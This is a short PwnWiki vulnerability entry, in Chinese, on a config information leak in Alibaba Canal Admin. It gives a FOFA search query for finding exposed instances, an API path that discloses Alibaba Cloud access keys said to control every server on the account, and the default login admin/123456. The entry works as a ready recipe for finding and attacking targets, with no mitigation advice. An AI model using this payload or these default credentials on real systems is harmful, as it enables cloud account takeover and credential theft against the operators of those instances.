Alibaba Canal config 云密鑰信息洩露漏洞

From PwnWiki

FOFA

title="Canal Admin"

Payload

/api/v1/canal/config/1/0

其中洩露了 aliyun.access 密鑰,可以控制密鑰下的所有服務器


其中還含有默認口令 admin/123456